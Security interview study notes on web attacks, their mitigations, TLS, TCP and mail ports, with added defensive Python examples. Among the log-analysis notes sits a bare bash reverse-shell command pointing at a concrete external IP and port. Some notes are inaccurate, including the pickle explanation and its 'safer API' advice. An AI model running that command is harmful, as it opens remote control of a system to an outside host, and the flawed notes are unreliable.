interview
Do you know any attacks, and their mitigations?
XSS
persistent XSS: malicious code is stored in the database, e.g. via a comment box or profile field.
reflected XSS: send the victim a URI that carries the malicious script.
DOM-based XSS: modifies elements of the DOM; it happens in the browser, on the client side.
mitigation: CSP; filter or encode special characters.
even if an XSS payload executes, setting cookies HttpOnly prevents them from being stolen by script.
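Added example (not part of the original notes): the persistent-XSS case above with the three mitigations side by side. A constructed comment containing an inline event handler is rendered once by string interpolation and once through output encoding, and a helper builds the CSP and HttpOnly cookie headers. The nonce, cookie value and class name are made up for the example.

```python
import html

# Constructed sample: a comment an attacker stores via the comment box (persistent XSS).
SAMPLE_COMMENT = '<img src=x onerror="alert(document.cookie)">'


def render_comment_vulnerable(text: str) -> str:
    # Raw user input is interpolated into the page: the browser parses the tag and runs the handler.
    return f"<p class='comment'>{text}</p>"


def render_comment_safe(text: str) -> str:
    # Output-encode the HTML special characters (& < > " ') so the input is displayed, not parsed.
    return f"<p class='comment'>{html.escape(text, quote=True)}</p>"


def security_headers(nonce: str) -> dict:
    # Defence in depth: a CSP that only allows same-origin and nonce-tagged scripts, and a
    # session cookie flagged HttpOnly (plus Secure, SameSite) so document.cookie cannot read it.
    # 'EXAMPLE_SESSION_ID' and the nonce are placeholders for the example.
    return {
        "Content-Security-Policy": (
            f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; object-src 'none'"
        ),
        "Set-Cookie": "session=EXAMPLE_SESSION_ID; HttpOnly; Secure; SameSite=Lax",
    }


def contains_active_html(rendered: str) -> bool:
    # Crude check used only to illustrate the difference: did a real tag survive rendering?
    return "<img" in rendered or "<script" in rendered


if __name__ == "__main__":
    print(render_comment_vulnerable(SAMPLE_COMMENT))
    print(render_comment_safe(SAMPLE_COMMENT))
    print(security_headers("abc123"))
```

Encoding at output time is the primary fix; CSP and HttpOnly limit the damage when some encoding is missed.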
phishing: spoofing an email or message, or directing users to a fake website where they enter personal information.
mitigation: firewall; keep the browser up to date; use Google Chrome or another trustworthy browser; install antivirus software.
CSRF: tricks the victim's browser into submitting a crafted web request: a forged URI, crafted image tags, hidden forms, or JavaScript XMLHttpRequests.
mitigation: CSRF token; check the Referer header to verify that the request came from our own site.
Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
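Added example (not from the original notes) of the two CSRF mitigations listed above: a per-session token compared in constant time, plus an Origin/Referer check against the site's own origin. The site origin, the session dict and the attacker origin are constructed for the example.

```python
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlparse

SITE_ORIGIN = "https://shop.example"  # constructed origin of the protected site


def issue_csrf_token(session: dict) -> str:
    # One unpredictable token per session, stored server-side and embedded in every form.
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def verify_csrf(session: dict, submitted_token: Optional[str], headers: dict) -> bool:
    # 1) Token check: a page on another origin cannot read our form, so it cannot know the token.
    expected = session.get("csrf_token")
    if not expected or not submitted_token:
        return False
    if not hmac.compare_digest(expected, submitted_token):
        return False
    # 2) Source check: Origin (preferred) or Referer must point at our own site.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # strict mode: refuse requests that carry no source information
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN


def demo() -> Tuple[bool, bool]:
    session = {}
    token = issue_csrf_token(session)
    # Legitimate submission: our form carries the token and the browser sends our Origin.
    legit = verify_csrf(session, token, {"Origin": SITE_ORIGIN})
    # Constructed forged request: the browser attaches the session cookie automatically,
    # but the attacker's hidden form has no token and the browser reports the foreign Origin.
    forged = verify_csrf(session, None, {"Origin": "https://attacker.example"})
    return legit, forged


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The token defeats the forged request on its own; the origin check is a second, independent layer, which matters because older clients may omit the Referer header.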
file upload: the user uploads an executable file that can later be accessed and executed. Evasion tricks: change the file suffix, or edit the POST request to change the MIME type of the PHP file so it looks like an image.
mitigation: rename the uploaded file; make sure the upload directory has no execute permissions; check that the uploaded file really has the expected file type.
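Added example (not from the original notes) implementing the three upload mitigations: the file type is checked against the leading bytes rather than the client-supplied suffix or MIME type, the stored name is replaced by a random one, and the file is written without the execute bit. The allow-list, upload directory and sample bytes are constructed for the example.

```python
import os
import secrets
from typing import Optional

# Extension -> accepted leading bytes ("magic numbers"); constructed allow-list of image types.
ALLOWED = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}


def validate_upload(filename: str, content_type: str, data: bytes) -> Optional[str]:
    """Return a fresh safe filename, or None if the upload must be rejected."""
    ext = os.path.splitext(filename.lower())[1]  # only the last suffix: "x.php.png" -> ".png"
    if ext not in ALLOWED:
        return None
    # Never trust the Content-Type the client sent; the bytes themselves must match the type.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return None
    if not content_type.startswith("image/"):
        return None
    # Discard the user's name entirely: a random name removes path tricks and double extensions.
    return secrets.token_hex(16) + ext


def store_upload(upload_dir: str, filename: str, content_type: str, data: bytes) -> Optional[str]:
    safe_name = validate_upload(filename, content_type, data)
    if safe_name is None:
        return None
    path = os.path.join(upload_dir, safe_name)
    # O_EXCL refuses to overwrite; mode 0o644 has no execute bit. The directory itself must also
    # be served without a script handler (web-server config, outside this snippet).
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8           # constructed minimal PNG header
    print(validate_upload("avatar.png", "image/png", png))
    print(validate_upload("shell.php.png", "image/png", b"<?php echo 1; ?>"))  # None
```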
SQL injection: malicious SQL statements are inserted into an entry field and executed by the database.
mitigation: filter special characters. Sending queries built from user input directly to the database is not secure; always use prepared statements to pass queries to the database.
code injection:
buffer overflow: triggered by malformed inputs; overwrites adjacent data or executable code, which may result in erratic program behaviour, including memory access errors, incorrect results, and crashes.
mitigation: ASLR
deserialization:
user input is converted into an object and gets executed.
e.g. in Python there is a library, pickle. When we call pickle.load, the serialized object is reconstructed through '__reduce__', which can change it completely. As we know, when we serialize an object, special methods like '__init__' are executed automatically.
mitigation: use other, safer APIs instead, like '__getnewargs__()', '__getstate__()' and '__setstate__()'.
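Added example (not from the original notes) showing the pickle behaviour described above and one defensive option: a class whose '__reduce__' names a callable gets that callable executed by pickle.loads, while an Unpickler subclass that restricts find_class to an allow-list refuses the same blob. The recording function, the class and the allow-list are constructed for the example; the callable here is harmless on purpose.

```python
import io
import pickle

CALLS = []  # records what got executed during unpickling (constructed side effect)


def record(tag: str) -> str:
    CALLS.append(tag)
    return tag


class Tricky:
    # __reduce__ tells pickle "to rebuild me, call record(...)". Any importable callable
    # could be named here, which is why loading untrusted pickles is dangerous.
    def __reduce__(self):
        return (record, ("reduce-ran-on-load",))


def unsafe_load(blob: bytes) -> object:
    return pickle.loads(blob)  # executes whatever callable the blob names


class RestrictedUnpickler(pickle.Unpickler):
    # Only a small allow-list of globals may be resolved; everything else is refused.
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(blob: bytes) -> object:
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def demo():
    blob = pickle.dumps(Tricky())
    CALLS.clear()
    unsafe_load(blob)
    ran_unsafe = list(CALLS)          # ["reduce-ran-on-load"]: the callable ran on load
    CALLS.clear()
    try:
        safe_load(blob)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True                # the restricted loader refused to resolve record()
    return ran_unsafe, blocked, list(CALLS)


if __name__ == "__main__":
    print(demo())
```

For data that only needs plain containers and scalars, a format with no code-loading semantics such as JSON avoids the problem altogether.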
Linux port check: lsof -i, netstat
process check: ps
analyse logs: traffic
/bin/bash -i >& /dev/tcp/103.50.253.190/4444 0>&1
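Added example (not from the original notes) for the log-analysis point: a small scanner that flags command lines of the form shown above, where an interactive shell is redirected to /dev/tcp/<host>/<port>, and extracts the remote host and port for triage. The log lines are constructed, and 192.0.2.10 is a documentation address rather than a real host.

```python
import re
from typing import List, Optional

# Constructed command-history / audit lines; not real logs.
SAMPLE_LINES = [
    "www-data: /bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "alice: ls -la /var/www",
    "bob: curl https://updates.example/list.txt",
    "www-data: sh -c 'exec 3<>/dev/tcp/192.0.2.10/8443'",
]

# /dev/tcp/<host>/<port> is a bash-only pseudo-device; a web-server account opening it is suspicious.
DEV_TCP = re.compile(r"/dev/tcp/([^/\s]+)/(\d{1,5})")


def scan_line(line: str) -> Optional[dict]:
    m = DEV_TCP.search(line)
    if not m:
        return None
    user = line.split(":", 1)[0].strip() if ":" in line else "unknown"
    return {
        "user": user,
        "remote": m.group(1),
        "port": int(m.group(2)),
        "interactive": " -i " in line,   # "bash -i" with redirected stdio: interactive shell
        "line": line,
    }


def scan(lines: List[str]) -> List[dict]:
    return [hit for hit in map(scan_line, lines) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"{hit['user']} -> {hit['remote']}:{hit['port']} interactive={hit['interactive']}")
```

A hit here is a starting point, not a verdict: follow it up with ps for the shell process and lsof -i / netstat for the matching established connection.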
TCP/UDP difference
troubleshoot if you cannot reach google.com
ping, traceroute, check Wireshark.
VPN and HTTP encryption algorithms: how do they work?
SSL: the client sends a hello to the server, and the server sends its certificate to the client. The certificate is checked against the third party (the CA), and the server checks the authority of the user.
how do they negotiate the session key?
- Client and server each generate a random value and send it to the other
- Server sends its public key to the client
- The client generates a value called the "pre-master secret" using both random values, encrypts it with the server's public key, then sends it to the server
- Now both client and server have each other's random values and the "pre-master secret", so based on this information they can both generate the same session key and start using it to encrypt the following messages.
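Added example (not from the original notes) that walks through the four steps above with both sides' values visible. It uses a toy RSA keypair built from two small primes (insecure, chosen only so the example runs without a crypto library) and an HMAC-SHA256 stand-in for the TLS PRF; the labels "master secret" and "key expansion" follow TLS 1.2 naming but the derivation is simplified. The only check that matters is that the client and server arrive at the same session key.

```python
import hashlib
import hmac
import secrets

# Toy RSA keypair (insecure, small primes) so the example runs stand-alone.
P, Q, E = 1000000007, 998244353, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))


def rsa_encrypt(m: int) -> int:
    return pow(m, E, N)       # anyone with the public key (E, N) can do this


def rsa_decrypt(c: int) -> int:
    return pow(c, D, N)       # only the holder of D (the server) can do this


def prf(secret: bytes, label: bytes, seed: bytes) -> bytes:
    # Simplified stand-in for the TLS PRF: one HMAC-SHA256 over label || seed.
    return hmac.new(secret, label + seed, hashlib.sha256).digest()


def derive_session_key(premaster: bytes, client_random: bytes, server_random: bytes) -> bytes:
    master = prf(premaster, b"master secret", client_random + server_random)
    return prf(master, b"key expansion", server_random + client_random)


def handshake(client_random: bytes = b"", server_random: bytes = b"", premaster: bytes = b""):
    # 1. hello: each side generates a random value and sends it to the other.
    client_random = client_random or secrets.token_bytes(32)
    server_random = server_random or secrets.token_bytes(32)
    # 2. the server sends its public key (E, N); 3. the client picks a pre-master secret
    #    (6 bytes keeps the integer below the toy modulus) and encrypts it for the server.
    premaster = premaster or secrets.token_bytes(6)
    on_the_wire = rsa_encrypt(int.from_bytes(premaster, "big"))
    # The server recovers the pre-master secret with its private key.
    server_premaster = rsa_decrypt(on_the_wire).to_bytes(6, "big")
    # 4. both sides combine the randoms and the pre-master secret into the same session key.
    client_key = derive_session_key(premaster, client_random, server_random)
    server_key = derive_session_key(server_premaster, client_random, server_random)
    return client_key, server_key, on_the_wire


if __name__ == "__main__":
    ck, sk, wire = handshake()
    print("keys match:", ck == sk, "wire value:", wire)
```

An eavesdropper sees both random values and the RSA ciphertext but not the pre-master secret, so it cannot compute the session key; this is also why modern TLS replaces RSA key transport with an ephemeral Diffie-Hellman exchange for forward secrecy.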
how does TCP work?
3-way handshake: SYN -> SYN+ACK -> ACK
HTTP headers?
Referer, Cookie, session, expiry date; URI, method, return code.
Why is your computer slow?
- Running out of RAM (Random Access Memory)
- Running out of disk drive space (HDD or SSD)
- Old or fragmented hard drive
- Too many background programs
- Too many startup programs
- Falling behind on Windows or driver updates
- Malware or viruses
- Special effects and visual features
mitigation:
- Restart your computer
- Clean your hard drive
- Empty your Recycle Bin
- Remove unwanted programs
- Clean your Downloads folder
- Scan for malware and viruses
- Reinstall the system
When you have a website, what security problems will you consider?
- limit user input
- update the software
- restrict file uploads
- back up the website
What is POP3 and which are the default POP3 ports?
Post Office Protocol version 3 (POP3) is a standard mail protocol used to receive emails from a remote server to a local email client. POP3 allows you to download email messages on your local computer and read them even when you are offline. Note that when you use POP3 to connect to your email account, messages are downloaded locally and removed from the email server. This means that if you access your account from multiple locations, that may not be the best option for you. On the other hand, if you use POP3, your messages are stored on your local computer, which reduces the space your email account uses on your web server.
By default, the POP3 protocol works on two ports:
Port 110 - this is the default POP3 non-encrypted port
Port 995 - this is the port you need to use if you want to connect using POP3 securely
What is IMAP and which are the default IMAP ports?
The Internet Message Access Protocol (IMAP) is a mail protocol used for accessing email on a remote web server from a local client. IMAP and POP3 are the two most commonly used Internet mail protocols for retrieving emails. Both protocols are supported by all modern email clients and web servers.
While the POP3 protocol assumes that your email is being accessed only from one application, IMAP allows simultaneous access by multiple clients. This is why IMAP is more suitable for you if you're going to access your email from different locations or if your messages are managed by multiple users.
By default, the IMAP protocol works on two ports:
Port 143 - this is the default IMAP non-encrypted port
Port 993 - this is the port you need to use if you want to connect using IMAP securely
What is SMTP and which are the default SMTP ports?
Simple Mail Transfer Protocol (SMTP) is the standard protocol for sending emails across the Internet.
By default, the SMTP protocol works on three ports:
Port 25 - this is the default SMTP non-encrypted port
Port 2525 - this port is opened on all SiteGround servers in case port 25 is filtered (by your ISP for example) and you want to send non-encrypted emails with SMTP
Port 465 - this is the port used if you want to send messages using SMTP securely